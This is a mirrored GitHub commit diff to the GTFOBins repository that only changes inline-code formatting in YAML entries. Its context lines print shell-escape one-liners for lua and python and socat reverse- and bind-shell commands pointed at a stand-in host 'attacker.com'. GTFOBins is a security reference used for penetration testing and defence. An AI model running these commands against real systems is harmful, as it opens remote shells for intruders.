mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 06:19:27 +01:00
Use double backtick for inline code
This commit is contained in:
parent
b016b7b9dd
commit
4de0246992
@ -3,7 +3,7 @@ functions:
|
|||||||
execute-interactive:
|
execute-interactive:
|
||||||
- code: lua -e 'os.execute("/bin/sh")'
|
- code: lua -e 'os.execute("/bin/sh")'
|
||||||
reverse-shell-non-interactive:
|
reverse-shell-non-interactive:
|
||||||
- description: Run <code>nc -l -p 12345</code> on the attacker box to receive the shell. This requires `lua-socket` installed.
|
- description: Run ``nc -l -p 12345`` on the attacker box to receive the shell. This requires `lua-socket` installed.
|
||||||
code: |
|
code: |
|
||||||
export RHOST=attacker.com
|
export RHOST=attacker.com
|
||||||
export RPORT=12345
|
export RPORT=12345
|
||||||
|
@ -3,7 +3,7 @@ functions:
|
|||||||
execute-interactive:
|
execute-interactive:
|
||||||
- code: python2 -c 'import os; os.system("/bin/sh")'
|
- code: python2 -c 'import os; os.system("/bin/sh")'
|
||||||
reverse-shell-interactive:
|
reverse-shell-interactive:
|
||||||
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell.
|
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
|
||||||
code: |
|
code: |
|
||||||
export RHOST=attacker.com
|
export RHOST=attacker.com
|
||||||
export RPORT=12345
|
export RPORT=12345
|
||||||
|
@ -3,7 +3,7 @@ functions:
|
|||||||
execute-interactive:
|
execute-interactive:
|
||||||
- code: python3 -c 'import os; os.system("/bin/sh")'
|
- code: python3 -c 'import os; os.system("/bin/sh")'
|
||||||
reverse-shell-interactive:
|
reverse-shell-interactive:
|
||||||
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell.
|
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
|
||||||
code: |
|
code: |
|
||||||
export RHOST=attacker.com
|
export RHOST=attacker.com
|
||||||
export RPORT=12345
|
export RPORT=12345
|
||||||
|
@ -1,13 +1,13 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
reverse-shell-interactive:
|
reverse-shell-interactive:
|
||||||
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell.
|
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
|
||||||
code: |
|
code: |
|
||||||
RHOST=attacker.com
|
RHOST=attacker.com
|
||||||
RPORT=12345
|
RPORT=12345
|
||||||
socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
|
socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
|
||||||
bind-shell-interactive:
|
bind-shell-interactive:
|
||||||
- description: Run <code>socat FILE:`tty`,raw,echo=0 TCP:target.com:12345</code> on the attacker box to connect to the shell.
|
- description: Run ``socat FILE:`tty`,raw,echo=0 TCP:target.com:12345`` on the attacker box to connect to the shell.
|
||||||
code: |
|
code: |
|
||||||
LPORT=12345
|
LPORT=12345
|
||||||
socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:sh,pty,stderr,setsid,sigint,sane
|
socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:sh,pty,stderr,setsid,sigint,sane
|
||||||
|
Loading…
Reference in New Issue
Block a user